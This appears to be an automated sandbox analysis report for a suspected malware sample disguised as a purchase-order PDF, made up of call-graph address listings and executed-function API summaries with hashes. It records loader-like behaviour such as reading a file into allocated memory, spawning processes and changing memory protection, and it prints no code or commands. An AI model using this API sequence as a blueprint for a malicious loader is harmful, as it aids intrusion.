44b2c1 86177->86178 86178->86175 86180 44b2cf 86178->86180 86182 44b2dc 86180->86182 86185 414e94 __fcloseall 106 API calls 86180->86185 86181 44b20d 86183 44b211 86181->86183 86184 44b23b 86181->86184 86182->85614 86188 414e94 __fcloseall 106 API calls 86183->86188 86189 44b21e 86183->86189 86207 43526e 86184->86207 86185->86182 86187 44b242 86191 44b270 86187->86191 86192 44b248 86187->86192 86188->86189 86190 414e94 __fcloseall 106 API calls 86189->86190 86194 44b22e 86189->86194 86190->86194 86217 44b0af 111 API calls 86191->86217 86195 44b255 86192->86195 86197 414e94 __fcloseall 106 API calls 86192->86197 86194->85614 86198 44b265 86195->86198 86200 414e94 __fcloseall 106 API calls 86195->86200 86196 44b276 86218 43522c 67 API calls __fcloseall 86196->86218 86197->86195 86198->85614 86200->86198 86201 44b27c 86202 44b289 86201->86202 86203 414e94 __fcloseall 106 API calls 86201->86203 86204 44b299 86202->86204 86205 414e94 __fcloseall 106 API calls 86202->86205 86203->86202 86204->85614 86205->86204 86206->86181 86208 4138ba _malloc 67 API calls 86207->86208 86209 43527d 86208->86209 86210 4138ba _malloc 67 API calls 86209->86210 86211 43528d 86210->86211 86212 4138ba _malloc 67 API calls 86211->86212 86213 43529d 86212->86213 86216 4352bc 86213->86216 86219 43522c 67 API calls __fcloseall 86213->86219 86215 4352c8 86215->86187 86216->86187 86217->86196 86218->86201 86219->86215 86220->85491 86222 410148 SHGetDesktopFolder 86221->86222 86225 4101a3 _wcscpy 86221->86225 86223 41015a _wcscpy 86222->86223 86222->86225 86224 41018a SHGetPathFromIDListW 86223->86224 86223->86225 86224->86225 86225->85495 86226->85497 86228 40f5e0 152 API calls 86227->86228 86229 40f417 86228->86229 86230 42ca37 86229->86230 86232 40f42c 86229->86232 86233 42ca1f 86229->86233 86231 452574 140 API calls 86230->86231 86235 42ca50 86231->86235 86275 4037e0 139 API calls 7 library calls 86232->86275 86276 43717f 110 API calls _printf 86233->86276 86238 42ca76 86235->86238 86239 42ca54 86235->86239 86237 42ca2d 86237->86230 86242 41171a 75 API calls 86238->86242 86241 434fe1 106 API calls 86239->86241 86240 40f446 86240->85494 86243 42ca5e 86241->86243 86257 42cacc ctype 86242->86257 86277 43717f 110 API calls _printf 86243->86277 86245 42ccc3 86247 413a88 __fcloseall 67 API calls 86245->86247 86246 42ca6c 86246->86238 86248 42cccd 86247->86248 86249 434fe1 106 API calls 86248->86249 86250 42ccda 86249->86250 86254 401b70 75 API calls 86254->86257 86257->86245 86257->86254 86258 445051 86257->86258 86261 402cc0 86257->86261 86269 4026a0 86257->86269 86278 44c80c 87 API calls 3 library calls 86257->86278 86279 44b408 75 API calls 86257->86279 86259 41171a 75 API calls 86258->86259 86260 445080 _memcpy_s 86259->86260 86260->86257 86260->86260 86262 402d71 86261->86262 86263 402cd2 _memcpy_s ctype 86261->86263 86265 41171a 75 API calls 86262->86265 86264 41171a 75 API calls 86263->86264 86266 402cd9 86264->86266 86265->86263 86267 402cff 86266->86267 86268 41171a 75 API calls 86266->86268 86267->86257 86268->86267 86270 4026af 86269->86270 86273 40276b 86269->86273 86271 41171a 75 API calls 86270->86271 86272 4026ee ctype 86270->86272 86270->86273 86271->86272 86272->86273 86274 41171a 75 API calls 86272->86274 86273->86257 86274->86272 86275->86240 86276->86237 86277->86246 86278->86257 86279->86257 86280->85504 86281->85505 86282 553d3e0 86297 553b030 86282->86297 86284 553d46f 86300 553d2d0 86284->86300 86286 553d498 CreateFileW 86288 553d4e7 86286->86288 86289 553d4ec 86286->86289 86289->86288 86290 553d503 VirtualAlloc 86289->86290 86290->86288 86291 553d521 ReadFile 86290->86291 86291->86288 86292 553d53c 86291->86292 86293 553c2d0 13 API calls 86292->86293 86295 553d56f 86293->86295 86294 553d592 ExitProcess 86294->86288 86295->86294 86296 553d360 CreateProcessW 86295->86296 86296->86294 86303 553e4a0 GetPEB 86297->86303 86299 553b6bb 86299->86284 86301 553d2d9 Sleep 86300->86301 86302 553d2e7 86301->86302 86304 553e4ca 86303->86304 86304->86299 86305 431914 86306 431920 86305->86306 86307 431928 86306->86307 86308 43193d 86306->86308 86569 45e62e 116 API calls 3 library calls 86307->86569 86570 47f2b4 174 API calls 86308->86570 86311 43194a 86314 4095b0 ctype 86311->86314 86571 45e62e 116 API calls 3 library calls 86311->86571 86312 409708 86314->86312 86315 4097af 86314->86315 86317 409894 86314->86317 86319 4315b8 WaitForSingleObject 86314->86319 86322 431623 Sleep 86314->86322 86328 40986e Sleep 86314->86328 86329 4098f1 TranslateMessage DispatchMessageW 86314->86329 86347 4319c9 VariantClear 86314->86347 86348 4092c0 VariantClear 86314->86348 86349 45e62e 116 API calls 86314->86349 86351 40b380 86314->86351 86375 409340 86314->86375 86408 409030 86314->86408 86422 40d300 86314->86422 86427 40d320 86314->86427 86433 409a40 86314->86433 86572 40e380 VariantClear ctype 86314->86572 86315->86312 86556 40d590 VariantClear 86315->86556 86317->86314 86331 431673 CloseHandle 86317->86331 86332 43170c GetExitCodeProcess CloseHandle 86317->86332 86333 40d590 VariantClear 86317->86333 86335 46dd22 133 API calls 86317->86335 86337 46e641 134 API calls 86317->86337 86338 431781 Sleep 86317->86338 86346 4092c0 VariantClear 86317->86346 86557 447e59 75 API calls 86317->86557 86558 453b07 77 API calls 86317->86558 86559 4646a2 76 API calls 86317->86559 86561 444233 88 API calls _wcslen 86317->86561 86562 457509 VariantClear 86317->86562 86563 404120 86317->86563 86567 4717e3 VariantClear 86317->86567 86568 436272 6 API calls 86317->86568 86319->86314 86321 4315d6 GetExitCodeProcess CloseHandle 86319->86321 86560 40d590 VariantClear 86321->86560 86322->86317 86325 43163b timeGetTime 86322->86325 86325->86317 86328->86317 86330 409880 timeGetTime 86328->86330 86329->86314 86330->86317 86331->86317 86332->86317 86333->86317 86335->86317 86337->86317 86338->86314 86346->86317 86347->86314 86348->86314 86349->86314 86352 40b3a5 86351->86352 86353 40b53d 86351->86353 86354 430a99 86352->86354 86359 40b3b6 86352->86359 86573 45e62e 116 API calls 3 library calls 86353->86573 86574 45e62e 116 API calls 3 library calls 86354->86574 86357 40b528 86357->86314 86358 430aae 86362 4092c0 VariantClear 86358->86362 86359->86358 86363 40b3f2 86359->86363 86371 40b4fd ctype 86359->86371 86361 430dc9 86361->86361 86362->86357 86364 430ae9 VariantClear 86363->86364 86366 40b429 86363->86366 86373 40b476 ctype 86363->86373 86374 40b43b ctype 86364->86374 86365 40b4eb 86365->86371 86576 40e380 VariantClear ctype 86365->86576 86366->86374 86575 40e380 VariantClear ctype 86366->86575 86367 430d41 VariantClear 86367->86371 86370 41171a 75 API calls 86370->86373 86371->86357 86577 45e62e 116 API calls 3 library calls 86371->86577 86372 430d08 ctype 86372->86367 86372->86371 86373->86365 86373->86372 86374->86370 86374->86373 86376 409386 86375->86376 86377 409395 86375->86377 86578 4042f0 75 API calls __cinit 86376->86578 86380 42fba9 86377->86380 86382 42fc07 86377->86382 86384 42fc85 86377->86384 86387 42fd4f 86377->86387 86388 42fcd8 86377->86388 86392 42fd39 86377->86392 86396 40946f 86377->86396 86397 40947b 86377->86397 86399 4094c1 86377->86399 86404 4092c0 VariantClear 86377->86404 86407 409484 ctype 86377->86407 86581 453155 75 API calls 86377->86581 86583 40c620 118 API calls 86377->86583 86585 45e62e 116 API calls 3 library calls 86377->86585 86582 45e62e 116 API calls 3 library calls 86380->86582 86584 45e62e 116 API calls 3 library calls 86382->86584 86586 4781ae 140 API calls 86384->86586 86389 4092c0 VariantClear 86387->86389 86588 47f2b4 174 API calls 86388->86588 86389->86407 86391 42fc9c 86391->86407 86587 45e62e 116 API calls 3 library calls 86391->86587 86590 45e62e 116 API calls 3 library calls 86392->86590 86393 42fce9 86393->86407 86589 45e62e 116 API calls 3 library calls 86393->86589 86579 409210 VariantClear 86396->86579 86402 4092c0 VariantClear 86397->86402 86399->86407 86580 404260 76 API calls 86399->86580 86402->86407 86404->86377 86405 4094e1 86406 4092c0 VariantClear 86405->86406 86406->86407 86407->86314 86591 409110 117 API calls 86408->86591 86410 42ceb6 86601 410ae0 VariantClear ctype 86410->86601 86412 42cebf 86413 42cea9 86600 45e62e 116 API calls 3 library calls 86413->86600 86415 40906e 86415->86410 86415->86413 86416 4090a4 86415->86416 86592 404160 86416->86592 86419 4090f0 ctype 86419->86314 86420 4092c0 VariantClear 86421 4090be ctype 86420->86421 86421->86419 86421->86420 86423 4292e3 86422->86423 86424 40d30c 86422->86424 86425 429323 86423->86425 86426 4292fd TranslateAcceleratorW 86423->86426 86424->86314 86425->86314 86426->86424 86428 4296d0 86427->86428 86431 40d32f 86427->86431 86428->86314 86429 40d33c 86429->86314 86430 42972a IsDialogMessageW 86430->86429 86430->86431 86431->86429 86431->86430 86736 4340ec GetClassLongW 86431->86736 86434 409a66 _wcslen 86433->86434 86435 40aade _memcpy_s ctype 86434->86435 86436 41171a 75 API calls 86434->86436 86738 401380 75 API calls 86435->86738 86437 409a9c _memcpy_s 86436->86437 86438 41171a 75 API calls 86437->86438 86440 409abd 86438->86440 86440->86435 86443 409aeb CharUpperBuffW 86440->86443 86447 409b09 ctype 86440->86447 86441 42cee9 86442 41171a 75 API calls 86441->86442 86444 42cf10 _memcpy_s 86442->86444 86443->86447 86770 45e62e 116 API calls 3 library calls 86444->86770 86483 409b88 ctype 86447->86483 86739 47d10e 150 API calls 86447->86739 86448 4092c0 VariantClear 86449 42e5e0 86448->86449 86771 410ae0 VariantClear ctype 86449->86771 86451 42e5f2 86452 409e4a 86452->86444 86454 41171a 75 API calls 86452->86454 86459 409ea4 86452->86459 86453 40aa5b 86456 41171a 75 API calls 86453->86456 86454->86459 86455 41171a 75 API calls 86455->86483 86473 40aa81 _memcpy_s ctype 86456->86473 86457 409ed0 86461 42d50d 86457->86461 86517 409ef8 _memcpy_s ctype 86457->86517 86749 40b800 VariantClear VariantClear ctype 86457->86749 86459->86457 86460 41171a 75 API calls 86459->86460 86462 42d480 86460->86462 86463 42d527 86461->86463 86750 40b800 VariantClear VariantClear ctype 86461->86750 86467 42d491 86462->86467 86745 44b3f6 75 API calls 86462->86745 86463->86517 86751 40e2e0 VariantClear ctype 86463->86751 86464 42d195 VariantClear 86464->86483 86465 40a3a7 86470 40a415 86465->86470 86515 42db5c 86465->86515 86746 40df50 75 API calls 86467->86746 86476 41171a 75 API calls 86470->86476 86471 4092c0 VariantClear 86471->86483 86481 41171a 75 API calls 86473->86481 86492 40a41c 86476->86492 86479 42db96 86757 45e62e 116 API calls 3 library calls 86479->86757 86481->86435 86482 42d4a6 86747 4530b3 75 API calls 86482->86747 86483->86444 86483->86452 86483->86453 86483->86455 86483->86464 86483->86471 86483->86473 86484 42d128 86483->86484 86488 42d20c 86483->86488 86499 42dbb9 86483->86499 86740 40c3e0 75 API calls 86483->86740 86741 40c620 118 API calls 86483->86741 86743 40be00 75 API calls 2 library calls 86483->86743 86744 40e380 VariantClear ctype 86483->86744 86486 4092c0 VariantClear 86484->86486 86491 42d131 86486->86491 86487 42d4d7 86748 4530b3 75 API calls 86487->86748 86488->86314 86742 410ae0 VariantClear ctype 86491->86742 86502 40a481 86492->86502 86758 40c8a0 VariantClear ctype 86492->86758 86494 402cc0 75 API calls 86494->86517 86498 4092c0 VariantClear 86531 40a534 _memcpy_s ctype 86498->86531 86499->86448 86500 41171a 75 API calls 86500->86517 86501 411421 74 API calls __cinit 86501->86517 86503 40a4ed 86502->86503 86504 42dc1e VariantClear 86502->86504 86502->86531 86508 40a4ff ctype 86503->86508 86759 40e380 VariantClear ctype 86503->86759 86504->86508 86507 41171a 75 API calls 86507->86531 86508->86507 86508->86531 86512 44b3f6 75 API calls 86512->86517 86513 42deb6 VariantClear 86513->86531 86514 40a73c 86516 42e237 86514->86516 86524 40a76b 86514->86524 86756 4721e5 VariantClear 86515->86756 86763 46e709 VariantClear VariantClear ctype 86516->86763 86517->86435 86517->86465 86517->86479 86517->86494 86517->86500 86517->86501 86517->86512 86517->86515 86520 40a053 86517->86520 86752 45ee98 75 API calls 86517->86752 86753 4019e0 76 API calls 86517->86753 86754 404260 76 API calls 86517->86754 86755 409210 VariantClear 86517->86755 86518 42dfe9 VariantClear 86518->86531 86519 42df47 VariantClear 86519->86531 86520->86314 86521 40a7a2 86536 40a7ad ctype 86521->86536 86764 40b800 VariantClear VariantClear ctype 86521->86764 86523 40e380 VariantClear 86523->86531 86524->86521 86546 40a800 ctype 86524->86546 86737 40b800 VariantClear VariantClear ctype 86524->86737 86527 41171a 75 API calls 86527->86531 86528 40a8b0 86542 40a8c2 ctype 86528->86542 86766 40e380 VariantClear ctype 86528->86766 86529 42e312 86532 42e337 VariantClear 86529->86532 86529->86542 86530 41171a 75 API calls 86533 42dd10 VariantInit VariantCopy 86530->86533 86531->86498 86531->86513 86531->86514 86531->86516 86531->86518 86531->86519 86531->86523 86531->86527 86531->86530 86760 46e9cd 75 API calls 86531->86760 86761 409210 VariantClear 86531->86761 86762 44cc6c VariantClear ctype 86531->86762 86532->86542 86533->86531 86535 42dd30 VariantClear 86533->86535 86534 42e3b2 86543 42e3da VariantClear 86534->86543 86550 40a91a ctype 86534->86550 86535->86531 86537 40a7ee 86536->86537 86541 42e2a7 VariantClear 86536->86541 86536->86546 86537->86546 86765 40e380 VariantClear ctype 86537->86765 86539 40a908 86539->86550 86767 40e380 VariantClear ctype 86539->86767 86541->86546 86542->86534 86542->86539 86543->86550 86545 42e47f 86549 42e4a3 VariantClear 86545->86549 86555 40a957 ctype 86545->86555 86546->86528 86546->86529 86547 40a945 86547->86555 86768 40e380 VariantClear ctype 86547->86768 86549->86555 86550->86545 86550->86547 86552 40aa22 ctype 86552->86314 86553 42e559 VariantClear 86553->86555 86555->86552 86555->86553 86769 40e380 VariantClear ctype 86555->86769 86556->86312 86557->86317 86558->86317 86559->86317 86560->86317 86561->86317 86562->86317 86564 40412e 86563->86564 86565 4092c0 VariantClear 86564->86565 86566 404138 86565->86566 86566->86338 86567->86317 86568->86317 86569->86314 86570->86311 86571->86314 86572->86314 86573->86354 86574->86358 86575->86374 86576->86371 86577->86361 86578->86377 86579->86397 86580->86405 86581->86377 86582->86407 86583->86377 86584->86407 86585->86377 86586->86391 86587->86407 86588->86393 86589->86407 86590->86387 86591->86415 86593 4092c0 VariantClear 86592->86593 86594 40416e 86593->86594 86595 404120 VariantClear 86594->86595 86596 40419b 86595->86596 86602 4734b7 86596->86602 86646 40efe0 86596->86646 86597 4041c6 86597->86410 86597->86421 86600->86410 86601->86412 86603 453063 111 API calls 86602->86603 86604 4734d7 86603->86604 86605 473545 86604->86605 86606 47350c 86604->86606 86654 463c42 86605->86654 86608 4092c0 VariantClear 86606->86608 86613 473514 86608->86613 86609 473558 86610 47355c 86609->86610 86626 473595 86609->86626 86611 4092c0 VariantClear 86610->86611 86621 473564 86611->86621 86612 473616 86667 463d7e 86612->86667 86613->86597 86615 473622 86617 473697 86615->86617 86618 47362c 86615->86618 86616 453063 111 API calls 86616->86626 86701 457838 86617->86701 86622 4092c0 VariantClear 86618->86622 86621->86597 86624 473634 86622->86624 86624->86597 86625 473655 86629 4092c0 VariantClear 86625->86629 86626->86612 86626->86616 86626->86625 86713 462f5a 87 API calls __wcsicoll 86626->86713 86640 47365d 86629->86640 86630 4736b0 86714 45e62e 116 API calls 3 library calls 86630->86714 86631 4736c9 86715 40e7e0 76 API calls 86631->86715 86634 4736db 86644 4736ff 86634->86644 86716 40d030 76 API calls 86634->86716 86635 4736ba GetCurrentProcess TerminateProcess 86635->86631 86637 473731 86642 473744 FreeLibrary 86637->86642 86643 47374b 86637->86643 86638 4736f1 86717 46b945 134 API calls 2 library calls 86638->86717 86640->86597 86642->86643 86643->86597 86644->86637 86718 40d030 76 API calls 86644->86718 86719 46b945 134 API calls 2 library calls 86644->86719 86647 40eff5 CreateFileW 86646->86647 86648 4299bf 86646->86648 86649 40f017 86647->86649 86648->86649 86650 4299c4 CreateFileW 86648->86650 86649->86597 86650->86649 86651 4299ea 86650->86651 86735 40e0d0 SetFilePointerEx SetFilePointerEx 86651->86735 86653 4299f5 86653->86649 86720 45335b 76 API calls 86654->86720 86656 463c5d 86721 442c52 80 API calls _wcslen 86656->86721 86658 463c72 86660 40c060 75 API calls 86658->86660 86666 463cac 86658->86666 86661 463c8e 86660->86661 86722 4608ce 75 API calls _memcpy_s 86661->86722 86663 463ca4 86664 40c740 75 API calls 86663->86664 86664->86666 86665 463cf7 86665->86609 86666->86665 86723 462f5a 87 API calls __wcsicoll 86666->86723 86668 453063 111 API calls 86667->86668 86669 463d99 86668->86669 86670 463de0 86669->86670 86671 463dca 86669->86671 86725 40c760 78 API calls 86670->86725 86724 453081 111 API calls 86671->86724 86674 463dd0 LoadLibraryW 86675 463e09 86674->86675 86677 463e3e 86675->86677 86680 463e19 86675->86680 86676 463de7 86676->86680 86726 40c760 78 API calls 86676->86726 86681 463e4e 86677->86681 86682 463e7b 86677->86682 86679 463dfb 86679->86680 86727 40c760 78 API calls 86679->86727 86680->86615 86728 40d500 75 API calls 86681->86728 86730 40c760 78 API calls 86682->86730 86686 463e82 GetProcAddress 86690 463e90 86686->86690 86687 463e57 86729 45efe7 77 API calls ctype 86687->86729 86689 463e62 GetProcAddress 86692 463e79 86689->86692 86690->86680 86691 463edf 86690->86691 86690->86692 86691->86680 86694 463eef FreeLibrary 86691->86694 86692->86690 86731 403470 75 API calls _memcpy_s 86692->86731 86694->86680 86695 463eb4 86732 40d500 75 API calls 86695->86732 86697 463ebd 86733 45efe7 77 API calls ctype 86697->86733 86699 463ec8 GetProcAddress 86734 401330 ctype 86699->86734 86702 457a4c 86701->86702 86708 45785f _strcat _wcslen _wcscpy ctype 86701->86708 86709 410d40 86702->86709 86703 453081 111 API calls 86703->86708 86704 443576 78 API calls 86704->86708 86705 40c760 78 API calls 86705->86708 86706 4138ba 67 API calls _malloc 86706->86708 86707 40f580 77 API calls 86707->86708 86708->86702 86708->86703 86708->86704 86708->86705 86708->86706 86708->86707 86710 410d55 86709->86710 86711 410ded VirtualProtect 86710->86711 86712 410dbb 86710->86712 86711->86712 86712->86630 86712->86631 86713->86626 86714->86635 86715->86634 86716->86638 86717->86644 86718->86644 86719->86644 86720->86656 86721->86658 86722->86663 86723->86665 86724->86674 86725->86676 86726->86679 86727->86675 86728->86687 86729->86689 86730->86686 86731->86695 86732->86697 86733->86699 86734->86691 86735->86653 86736->86431 86737->86521 86738->86441 86739->86447 86740->86483 86741->86483 86742->86552 86743->86483 86744->86483 86745->86467 86746->86482 86747->86487 86748->86457 86749->86461 86750->86463 86751->86517 86752->86517 86753->86517 86754->86517 86755->86517 86756->86479 86757->86499 86758->86492 86759->86508 86760->86531 86761->86531 86762->86531 86763->86521 86764->86536 86765->86546 86766->86542 86767->86550 86768->86555 86769->86555 86770->86499 86771->86451 86772 42919b 86777 40ef10 86772->86777 86775 411421 __cinit 74 API calls 86776 4291aa 86775->86776 86778 41171a 75 API calls 86777->86778 86779 40ef17 86778->86779 86780 42ad48 86779->86780 86785 40ef40 74 API calls __cinit 86779->86785 86782 40ef2a 86786 40e470 86782->86786 86785->86782 86787 40c060 75 API calls 86786->86787 86788 40e483 GetVersionExW 86787->86788 86789 4021e0 75 API calls 86788->86789 86790 40e4bb 86789->86790 86812 40e600 86790->86812 86794 42accc 86798 42ad28 GetSystemInfo 86794->86798 86802 42ad38 GetSystemInfo 86798->86802 86799 40e557 GetCurrentProcess 86832 40ee30 LoadLibraryA GetProcAddress 86799->86832 86800 40e56c 86800->86802 86825 40eee0 86800->86825 86805 40e5c9 86829 40eea0 86805->86829 86808 40e5e0 86810 40e5f1 FreeLibrary 86808->86810 86811 40e5f4 86808->86811 86809 40e5dd FreeLibrary 86809->86808 86810->86811 86811->86775 86813 40e60b 86812->86813 86814 40c740 75 API calls 86813->86814 86815 40e4c2 86814->86815 86816 40e620 86815->86816 86817 40e62a 86816->86817 86818 42ac93 86817->86818 86819 40c740 75 API calls 86817->86819 86820 40e4ce 86819->86820 86820->86794 86821 40ee70 86820->86821 86822 40e551 86821->86822 86823 40ee76 LoadLibraryA 86821->86823 86822->86799 86822->86800 86823->86822 86824 40ee87 GetProcAddress 86823->86824 86824->86822 86826 40e5bf 86825->86826 86827 40eee6 LoadLibraryA 86825->86827 86826->86798 86826->86805 86827->86826 86828 40eef7 GetProcAddress 86827->86828 86828->86826 86833 40eec0 LoadLibraryA GetProcAddress 86829->86833 86831 40e5d3 GetNativeSystemInfo 86831->86808 86831->86809 86832->86800 86833->86831 86834 42e89e 86841 40c000 86834->86841 86836 42e8ac 86837 409a40 165 API calls 86836->86837 86838 42e8ca 86837->86838 86852 44b92e VariantClear 86838->86852 86840 42f3ae 86842 40c014 86841->86842 86843 40c007 86841->86843 86845 40c01a 86842->86845 86846 40c02c 86842->86846 86853 409210 VariantClear 86843->86853 86854 409210 VariantClear 86845->86854 86847 41171a 75 API calls 86846->86847 86851 40c033 86847->86851 86848 40c00f 86848->86836 86850 40c023 86850->86836 86851->86836 86852->86840 86853->86848 86854->86850

                                                                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                                                                            Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                            • String ID: 0vH$4RH
                                                                                                                                                                                                                                                                                                            • API String ID: 1143807570-2085553193
                                                                                                                                                                                                                                                                                                            • Opcode ID: 4e9d22f23849f3857f7ef5f590f0c722d0218e828fe04b281823bbea8646989b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e9d22f23849f3857f7ef5f590f0c722d0218e828fe04b281823bbea8646989b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                                                                                                                                                                                                            Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                                            control_flow_graph 1204 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1213 40e506-40e509 1204->1213 1214 42accc-42acd1 1204->1214 1217 40e540-40e555 call 40ee70 1213->1217 1218 40e50b-40e51c 1213->1218 1215 42acd3-42acdb 1214->1215 1216 42acdd-42ace0 1214->1216 1219 42ad12-42ad20 1215->1219 1220 42ace2-42aceb 1216->1220 1221 42aced-42acf0 1216->1221 1231 40e557-40e573 GetCurrentProcess call 40ee30 1217->1231 1232 40e579-40e5a8 1217->1232 1222 40e522-40e525 1218->1222 1223 42ac9b-42aca7 1218->1223 1230 42ad28-42ad2d GetSystemInfo 1219->1230 1220->1219 1221->1219 1228 42acf2-42ad06 1221->1228 1222->1217 1229 40e527-40e537 1222->1229 1226 42acb2-42acba 1223->1226 1227 42aca9-42acad 1223->1227 1226->1217 1227->1217 1233 42ad08-42ad0c 1228->1233 1234 42ad0e 1228->1234 1235 42acbf-42acc7 1229->1235 1236 40e53d 1229->1236 1238 42ad38-42ad3d GetSystemInfo 1230->1238 1231->1232 1245 40e575 1231->1245 1232->1238 1239 40e5ae-40e5c3 call 40eee0 1232->1239 1233->1219 1234->1219 1235->1217 1236->1217 1239->1230 1244 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1239->1244 1248 40e5e0-40e5ef 1244->1248 1249 40e5dd-40e5de FreeLibrary 1244->1249 1245->1232 1250 40e5f1-40e5f2 FreeLibrary 1248->1250 1251 40e5f4-40e5ff 1248->1251 1249->1248 1250->1251
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                                                                                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: pMH
                                                                                                                                                                                                                                                                                                            • API String ID: 2923339712-2522892712
                                                                                                                                                                                                                                                                                                            • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                                                                                                                                                            • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                                                                                                                                                                                                            Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
